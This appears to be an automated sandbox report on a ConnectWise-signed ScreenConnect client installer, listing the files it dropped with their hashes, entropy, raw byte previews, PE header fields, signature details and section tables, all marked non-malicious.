                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):61216
                                                                                                                                                                                                Entropy (8bit):6.31175789874945
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:1536:SW/+lo6MOc8IoiKWjbNv8DtyQ4RE+TC6VAhVbIF7fIxp:SLlo6dccl9yQGVtFra
                                                                                                                                                                                                MD5:6DF2DEF5E591E2481E42924B327A9F15
                                                                                                                                                                                                SHA1:38EAB6E9D99B5CAEEC9703884D25BE8D811620A9
                                                                                                                                                                                                SHA-256:B6A05985C4CF111B94A4EF83F6974A70BF623431187691F2D4BE0332F3899DA9
                                                                                                                                                                                                SHA-512:5724A20095893B722E280DBF382C9BFBE75DD4707A98594862760CBBD5209C1E55EEAF70AD23FA555D62C7F5E54DE1407FB98FC552F42DCCBA5D60800965C6A5
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L............."...0.................. ........@.. ....................... ......3]....@.....................................O.......,............... )..............8............................................ ............... ..H............text........ ...................... ..`.rsrc...,...........................@..@.reloc..............................@..B........................H........S......................x.........................................(....*^.(.......a...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!...*...0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s!...o(...%~....o)...}......(....o*...o+....(,.....@...%..(.....o-....s....}.....{...........s/...o0....s....}..
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):266
                                                                                                                                                                                                Entropy (8bit):4.842791478883622
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):601376
                                                                                                                                                                                                Entropy (8bit):6.185921191564225
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:6144:r+z3H0n063rDHWP5hLG/6XixJQm16Eod7ZeYai1FzJTZJ5BCEOG6y9QsZSc4F2/Q:qzEjrTWPMLBfWFaSdJ5BeG6xs6/yRod
                                                                                                                                                                                                MD5:20AB8141D958A58AADE5E78671A719BF
                                                                                                                                                                                                SHA1:F914925664AB348081DAFE63594A64597FB2FC43
                                                                                                                                                                                                SHA-256:9CFD2C521D6D41C3A86B6B2C3D9B6A042B84F2F192F988F65062F0E1BFD99CAB
                                                                                                                                                                                                SHA-512:C5DD5ED90C516948D3D8C6DFA3CA7A6C8207F062883BA442D982D8D05A7DB0707AFEC3A0CB211B612D04CCD0B8571184FC7E81B2E98AE129E44C5C0E592A5563
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{<............"...0.................. ... ....@.. .......................`.......x....@.................................=...O.... .................. )...@..........8............................................ ............... ..H............text...`.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................q.......H........H................................................................{D...*..{E...*V.(F.....}D.....}E...*...0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...*.*.*. }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X*...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N...*..{O...*..{P...*V.(F.....}O.....}P...*.0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...*.*.*. 1.c. )UU.
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):266
                                                                                                                                                                                                Entropy (8bit):4.842791478883622
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):2573
                                                                                                                                                                                                Entropy (8bit):5.026361555169168
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:48:3FYZ8h9o5gI0AsHMrAXQ3MrTMrRGTDBTo:1YiW4AjEvEJ
                                                                                                                                                                                                MD5:3133DE245D1C278C1C423A5E92AF63B6
                                                                                                                                                                                                SHA1:D75C7D2F1E6B49A43B2F879F6EF06A00208EB6DC
                                                                                                                                                                                                SHA-256:61578953C28272D15E8DB5FD1CFFB26E7E16B52ADA7B1B41416232AE340002B7
                                                                                                                                                                                                SHA-512:B22D4EC1D99FB6668579FA91E70C182BEC27F2E6B4FF36223A018A066D550F4E90AAC3DFFD8C314E0D99B9F67447613CA011F384F693C431A7726CE0665D7647
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10074), with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):17866
                                                                                                                                                                                                Entropy (8bit):5.954687824833028
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:384:ze1oEQwK45aMUf6FX9hJX9FX9R/QPIYM7Y7:zd6FX9hJX9FX9R/QPIN07
                                                                                                                                                                                                MD5:1DC9DD74A43D10C5F1EAE50D76856F36
                                                                                                                                                                                                SHA1:E4080B055DD3A290DB546B90BCF6C5593FF34F6D
                                                                                                                                                                                                SHA-256:291FA1F674BE3CA15CFBAB6F72ED1033B5DD63BCB4AEA7FBC79FDCB6DD97AC0A
                                                                                                                                                                                                SHA-512:91E8A1A1AEA08E0D3CF20838B92F75FA7A5F5DACA9AEAD5AB7013D267D25D4BF3D291AF2CA0CCE8B73027D9717157C2C915F2060B2262BAC753BBC159055DBDF
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.2.10.8991" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" paramet
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):81696
                                                                                                                                                                                                Entropy (8bit):5.862223562830496
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:1536:/tytl44RzbwI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7Yp7gxd:8/KukLdUpc
                                                                                                                                                                                                MD5:B1799A5A5C0F64E9D61EE4BA465AFE75
                                                                                                                                                                                                SHA1:7785DA04E98E77FEC7C9E36B8C68864449724D71
                                                                                                                                                                                                SHA-256:7C39E98BEB59D903BC8D60794B1A3C4CE786F7A7AAE3274C69B507EBA94FAA80
                                                                                                                                                                                                SHA-512:AD8C810D7CC3EA5198EE50F0CEB091A9F975276011B13B10A37306052697DC43E58A16C84FA97AB02D3927CD0431F62AEF27E500030607828B2129F305C27BE8
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P............"...0..@...........^... ...`....@.. .......................`......j.....@..................................^..O....`.. ............... )...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc... ....`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....*^.(.......;...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(*........(+...o,...(-...t....
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):266
                                                                                                                                                                                                Entropy (8bit):4.842791478883622
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63847), with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):147976
                                                                                                                                                                                                Entropy (8bit):5.699150757460175
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3072:0aNYcT51/FXvMVNWfCXq9ymdrpErpErpXm2o9HuzhJOvP:0dcfiVITrpErpErpXmt8vOvP
                                                                                                                                                                                                MD5:B7DEB98212080D0214AD779A9446FF09
                                                                                                                                                                                                SHA1:05FAD5E8F0131FB5DD9D6EFA8F879E8FA684B569
                                                                                                                                                                                                SHA-256:C8DC03F64AA8D794D5A763B4260C18967267B7E9C55E1BE8D0ECCF5107C9D49A
                                                                                                                                                                                                SHA-512:7F93A5DF3A29312518CE188DBD72B987FD5B99DB58C4E8ACC7FF9677907B1B74F2126A6D4FD1DEF4FE136649D5690EB3EBFE739D57299C0A6E4E5EA7DB1C74E2
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tr
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):87
                                                                                                                                                                                                Entropy (8bit):3.463057265798253
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:/lqlhGXKRjgjkFmURueGvx2VTUz:4DRPAx2Kz
                                                                                                                                                                                                MD5:D2DED43CE07BFCE4D1C101DFCAA178C8
                                                                                                                                                                                                SHA1:CE928A1293EA2ACA1AC01B61A344857786AFE509
                                                                                                                                                                                                SHA-256:8EEE9284E733B9D4F2E5C43F71B81E27966F5CD8900183EB3BB77A1F1160D050
                                                                                                                                                                                                SHA-512:A05486D523556C75FAAEEFE09BB2F8159A111B1B3560142E19048E6E3898A506EE4EA27DD6A4412EE56A7CE7C21E8152B1CDD92804BAF9FAC43973FABE006A2F
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:......../...............................Microsoft Enhanced Cryptographic Provider v1.0.
                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):55
                                                                                                                                                                                                Entropy (8bit):4.306461250274409
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1835008
                                                                                                                                                                                                Entropy (8bit):4.3937993114379035
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:6144:gl4fiJoH0ncNXiUjt10q0G/gaocYGBoaUMMhA2NX4WABlBuNA+OBSqa:44vF0MYQUMM6VFYS+U
                                                                                                                                                                                                MD5:CDB14D65414835795C537A8CA77F943F
                                                                                                                                                                                                SHA1:44A4CDBB72DDD60D7A100C1047013499BE48CD79
                                                                                                                                                                                                SHA-256:8EB683A932DABB4F626D767974E0A6A23EAB448BAE69B385B4BB661333FDAA29
                                                                                                                                                                                                SHA-512:E8EA65BC8821EA6473D0FCC5554FD2F71A6F36C6C4276F098D1D4982A827E79592AAFF2E111EE67F6DC748A4B20AFEB06A33797774C72BFDDB851A997D803BDE
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.F.51..............................................................................................................................................................................................................................................................................................................................................y.Q.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                Entropy (8bit):6.5156988686305
                                                                                                                                                                                                TrID:
                                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                File name:pzPO97QouM.exe
                                                                                                                                                                                                File size:83'336 bytes
                                                                                                                                                                                                MD5:47891cf8a43a19e066fe70e812982c98
                                                                                                                                                                                                SHA1:b2a6e75ade18f10e2d0cd709630f5e551dbcefae
                                                                                                                                                                                                SHA256:fe9cb4c7eaa00078639484c209a3acf1d5195cbec55bd7981e733fb179bea899
                                                                                                                                                                                                SHA512:f4294182583c2ad7697afa3ad5a2ef75adde64e72b31fb3eb120bc37cac81e4b16f98fb5e0ffdab193770ca92c54c4b0aeebd70fc7148ef49f07bf9d05a01c2c
                                                                                                                                                                                                SSDEEP:1536:RoG6KpY6Qi3yj2wyq4HwiMO10HVLCJRpsWr6cdaxPBJYYD70xDP:LenkyfPAwiMq0RqRfbaxZJYYDa
                                                                                                                                                                                                TLSH:F4835B43B5D18875E9720E3118B1D9B4593FBE110EA48EAB3398427E0F351D19E3AE7B
                                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ycId...d...d.......n...............|.......A.......v.......v...m`..a...d...........e.......e.......e...Richd...........PE..L..
                                                                                                                                                                                                Icon Hash:00928e8e8686b000
                                                                                                                                                                                                Entrypoint:0x401489
                                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                                Digitally signed:true
                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                Time Stamp:0x66BBDDB2 [Tue Aug 13 22:26:58 2024 UTC]
                                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                                OS Version Major:5
                                                                                                                                                                                                OS Version Minor:1
                                                                                                                                                                                                File Version Major:5
                                                                                                                                                                                                File Version Minor:1
                                                                                                                                                                                                Subsystem Version Major:5
                                                                                                                                                                                                Subsystem Version Minor:1
                                                                                                                                                                                                Import Hash:37d5c89163970dd3cc69230538a1b72b
                                                                                                                                                                                                Signature Valid:true
                                                                                                                                                                                                Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                                                                                                                Signature Validation Error:The operation completed successfully
                                                                                                                                                                                                Error Number:0
                                                                                                                                                                                                Not Before, Not After
                                                                                                                                                                                                • 17/08/2022 01:00:00 16/08/2025 00:59:59
                                                                                                                                                                                                Subject Chain
                                                                                                                                                                                                • CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                                                                                                                                                                                                Version:3
                                                                                                                                                                                                Thumbprint MD5:AAE704EC2810686C3BF7704E660AFB5D
                                                                                                                                                                                                Thumbprint SHA-1:4C2272FBA7A7380F55E2A424E9E624AEE1C14579
                                                                                                                                                                                                Thumbprint SHA-256:82B4E7924D5BED84FB16DDF8391936EB301479CEC707DC14E23BC22B8CDEAE28
                                                                                                                                                                                                Serial:0B9360051BCCF66642998998D5BA97CE
                                                                                                                                                                                                Instruction
                                                                                                                                                                                                call 00007FCD3C61721Ah
                                                                                                                                                                                                jmp 00007FCD3C616CCFh
                                                                                                                                                                                                push ebp
                                                                                                                                                                                                mov ebp, esp
                                                                                                                                                                                                push 00000000h
                                                                                                                                                                                                call dword ptr [0040B048h]
                                                                                                                                                                                                push dword ptr [ebp+08h]
                                                                                                                                                                                                call dword ptr [0040B044h]
                                                                                                                                                                                                push C0000409h
                                                                                                                                                                                                call dword ptr [0040B04Ch]
                                                                                                                                                                                                push eax
                                                                                                                                                                                                call dword ptr [0040B050h]
                                                                                                                                                                                                pop ebp
                                                                                                                                                                                                ret
                                                                                                                                                                                                push ebp
                                                                                                                                                                                                mov ebp, esp
                                                                                                                                                                                                sub esp, 00000324h
                                                                                                                                                                                                push 00000017h
                                                                                                                                                                                                call dword ptr [0040B054h]
                                                                                                                                                                                                test eax, eax
                                                                                                                                                                                                je 00007FCD3C616E57h
                                                                                                                                                                                                push 00000002h
                                                                                                                                                                                                pop ecx
                                                                                                                                                                                                int 29h
                                                                                                                                                                                                mov dword ptr [004118C0h], eax
                                                                                                                                                                                                mov dword ptr [004118BCh], ecx
                                                                                                                                                                                                mov dword ptr [004118B8h], edx
                                                                                                                                                                                                mov dword ptr [004118B4h], ebx
                                                                                                                                                                                                mov dword ptr [004118B0h], esi
                                                                                                                                                                                                mov dword ptr [004118ACh], edi
                                                                                                                                                                                                mov word ptr [004118D8h], ss
                                                                                                                                                                                                mov word ptr [004118CCh], cs
                                                                                                                                                                                                mov word ptr [004118A8h], ds
                                                                                                                                                                                                mov word ptr [004118A4h], es
                                                                                                                                                                                                mov word ptr [004118A0h], fs
                                                                                                                                                                                                mov word ptr [0041189Ch], gs
                                                                                                                                                                                                pushfd
                                                                                                                                                                                                pop dword ptr [004118D0h]
                                                                                                                                                                                                mov eax, dword ptr [ebp+00h]
                                                                                                                                                                                                mov dword ptr [004118C4h], eax
                                                                                                                                                                                                mov eax, dword ptr [ebp+04h]
                                                                                                                                                                                                mov dword ptr [004118C8h], eax
                                                                                                                                                                                                lea eax, dword ptr [ebp+08h]
                                                                                                                                                                                                mov dword ptr [004118D4h], eax
                                                                                                                                                                                                mov eax, dword ptr [ebp-00000324h]
                                                                                                                                                                                                mov dword ptr [00411810h], 00010001h
                                                                                                                                                                                                Programming Language:
                                                                                                                                                                                                • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x1060c0x3c.rdata
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x130000x1e0.rsrc
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x118000x2d88
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x140000xddc.reloc
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0xfe380x70.rdata
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xfd780x40.rdata
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0xb0000x13c.rdata
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                .text0x10000x9cf80x9e00bae4521030709e187bdbe8a34d7bf731False0.6035650712025317data6.581464957368758IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                .rdata0xb0000x5d580x5e00ec94ce6ebdbe57640638e0aa31d08896False0.4178025265957447Applesoft BASIC program data, first line number 14.843224204192078IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                .data0x110000x11cc0x80004a548a5c04675d08166d3823a6bf61bFalse0.16357421875data2.0120795802951505IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                .rsrc0x130000x1e00x200aa256780346be2e1ee49ac6d69d2faffFalse0.52734375data4.703723272345726IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                .reloc0x140000xddc0xe00908329e10a1923a3c4938a10d44237d9False0.7776227678571429data6.495696626464028IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                RT_MANIFEST0x130600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                                                                                                                                                                                DLLImport
